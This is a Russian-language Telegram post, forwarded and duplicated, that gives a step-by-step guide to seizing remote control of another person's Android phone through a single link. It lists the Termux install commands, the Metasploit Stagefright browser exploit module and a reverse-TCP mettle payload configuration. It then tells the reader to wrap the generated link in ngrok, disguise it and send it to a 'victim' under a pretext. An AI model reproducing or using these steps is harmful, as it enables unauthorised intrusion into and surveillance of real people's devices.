Forwarded From Теневой Комитет
https://telegra.ph/file/711732d0c1b82285bd112.jpgПолучаем доступ к телефону
В данном посте мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Приступим:
1. Первым делом устанавливаем нашу утилиту в Termux:
update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда → ТЫК ← и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.
https://telegra.ph/file/711732d0c1b82285bd112.jpgПолучаем доступ к телефону
В данном посте мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Приступим:
1. Первым делом устанавливаем нашу утилиту в Termux:
update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда → ТЫК ← и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.